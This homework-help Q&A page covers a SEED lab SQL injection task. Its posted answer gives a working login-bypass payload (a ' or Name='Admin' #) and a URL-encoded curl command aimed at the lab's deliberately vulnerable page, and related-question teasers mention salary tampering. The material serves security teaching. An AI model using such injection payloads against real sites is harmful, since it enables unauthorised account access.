Question

In: Computer Science

Please explain how you got the answer thank you. • Task 2.1: SQL Injection Attack from...

Please explain how you got the answer thank you.

Task 2.1: SQL Injection Attack from webpage. Your task is to log into the web application as the administrator from the login page, so you can see the information of all the employees. We assume that you do know the administrator’s account name which is admin, but you do not know the ID or the password. You need to decide what to type in the Employee ID and Password fields to succeed in the attack.

Task 2.2: SQL Injection Attack from command line. Your task is to repeat Task 2.1, but you need to do it without using the webpage. You can use command line tools, such as curl, which can send HTTP requests. One thing that is worth mentioning is that if you want to include multiple parameters in HTTP requests, you need to put the URL and the parameters between a pair of single quotes; otherwise, the special characters used to separate parameters (such as &) will be interpreted by the shell program, changing the meaning of the command. The following example shows how to send an HTTP GET request to our web application, with two parameters (SUID and Password) attached: curl ’www.SeedLabSQLInjection.com/index.php?SUID=10000&Password=111’ If you need to include special characters in the SUID and Password fields, you need to encode them properly, or they can change the meaning of your requests. If you want to include single quote in those fields, you should use %27 instead; if you want to include white space, you should use %20. In this task, you do need to handle HTTP encoding while sending requests using curl.

Solutions

Expert Solution

Answer 2.1
**************

a ' or Name='Admin' #

if you see the URL

http://www.seedlabsqlinjection.com/unsafe_home.php?username=a+%27+or+Name%3D%27Admin%27+%23&Password=

where unsafe_home.php is the vulnerable page that we have to target for next task 2.2

Answer 2.2
*************

Now just past that URL with curl command as shown below

curl 'http://www.seedlabsqlinjection.com/unsafe_home.php?username=a+%27+or+Name%3D%27Admin%27+%23&Password=aass'

if you have any doubt then please ask me without any hesitation in the comment section below , if you like my answer then please thumbs up for the answer , before giving thumbs down please discuss the question it may possible that we may understand the question different way and i can edit and change the answers if you argue, thanks :)


Related Solutions

Can you please explain and show how you would complete the following SQL Injection Attacks tasks...
Can you please explain and show how you would complete the following SQL Injection Attacks tasks using the SEED lab seed Ubuntu 16.04 Virtual Machine: Task 3.1: Modify your own salary. As shown in the Edit Profile page, employees can only update their nicknames, emails, addresses, phone numbers, and passwords; they are not authorized to change their salaries. Assume that you (Alice) are a disgruntled employee, and your boss Boby did not increase your salary this year. You want to...
(Please show work so I can understand how you got to the answer - Thank you...
(Please show work so I can understand how you got to the answer - Thank you very much ) Via Gelato is a popular neighborhood gelato shop. The company has provided the following data concerning its operations: Fixed Element per Month Variable Element per Liter Actual Total for June Revenue $ 13.00 $ 72,540 Raw materials $ 4.75 $ 30,330 Wages $ 5,700 $ 1.50 $ 14,560 Utilities $ 1,730 $ 0.30 $ 3,800 Rent $ 2,700 $ 2,700 Insurance...
What is the most common SQL Injection Attack code that could be put into a vulnerable...
What is the most common SQL Injection Attack code that could be put into a vulnerable website textbox that means "OR True"?
SQL injection attacks continue to be a significant attack vector for threat actors. Use the Internet...
SQL injection attacks continue to be a significant attack vector for threat actors. Use the Internet to research these attacks. What are some recent attacks that have been initiated by SQL injection? How were they conducted? What defenses are there against them? Write a one-page paper on your research.
Please label everything so I understand how you got your answer. Thank you:) DeYoung Entertainment Enterprises...
Please label everything so I understand how you got your answer. Thank you:) DeYoung Entertainment Enterprises is considering replacing the latex molding machine it uses to fabricate rubber chickens with a newer, more efficient model. The old machine has a book value of $600,000 and a remaining useful life of 5 years. The current machine would be worn out and worthless in 5 years, but DeYoung can sell it now to a Halloween mask manufacturer for $265,000. The old machine...
Please start from Manufacutring Overhead Budget and please include formulas on how you got that answer...
Please start from Manufacutring Overhead Budget and please include formulas on how you got that answer This assignment asks you to set up an Excel budget spreadsheet file that automatically prepares the master budget for a company, given sales projections and information on beginning balances, production requirements, desired ending inventories, etc. Information on developing the budgets appears in Chapter 8 of your text, and examples of budget worksheets appear in the schedules throughout the chapter. Data Glamour Inc. produces and...
For each question, please explain how you got the answer. 1. The major function of RNA...
For each question, please explain how you got the answer. 1. The major function of RNA polymerase's sigma factor is A) recognition of the translational stop sequence B) recognition of the transcriptional start sequence C) recognition of the transcriptional stop sequence D) recognition of the translational start sequence E) None of these are correct 2. WHere is the amino acid attached to a tRNA molecule? A) 3′-hydroxyl of an adenine containing residue of 3’ end of tRNA B) 5′-hydroxyl of...
Please do not just give the answer. Please also explain how you got them. Thanks! 1....
Please do not just give the answer. Please also explain how you got them. Thanks! 1. Which of the following is not a valid method of applying LCNRV: A. logical categories of inventory (i.e. product line) B. the entire inventory C. inventory items to be sold within the next year D. individual inventory items E. None of the answer choices are correct 2. Which of the following would not require the company to account for the change retrospectively? A. From...
Can you please explain how you get to this answer? Thank you! --- Suppose Home has...
Can you please explain how you get to this answer? Thank you! --- Suppose Home has unit Labor requirements: 3 units of labor (hours) to produce one pound of apples, 2 units of labor (hours) to produce one pound of banana. Suppose Foreign has unit Labor requirements: 5 units oflabor (hours) to produce a pound of apples, 1 unit of labor (hours) to produce one pound of banana. 1) Draw the Relative Supply of Apples for the world (Home and...
Please show how work on how you got this answer. Q1: What will be the pressure...
Please show how work on how you got this answer. Q1: What will be the pressure (in mmHg) inside of a 50.0 L container that holds 7.00 moles of hydrogen gas at 0.0 C? Q2: Oxygen Gass is produced for use in a small-scale experiment by the catalytic decomposition of hydrogen peroxide: 2 H2O2 (aq) -------------------> 2 H2O (l) + O2 (g) If 50.0 mL of a 1.00 M solution of H2O2 completely decomposes and what volume of dry oxygen...
ADVERTISEMENT
ADVERTISEMENT
ADVERTISEMENT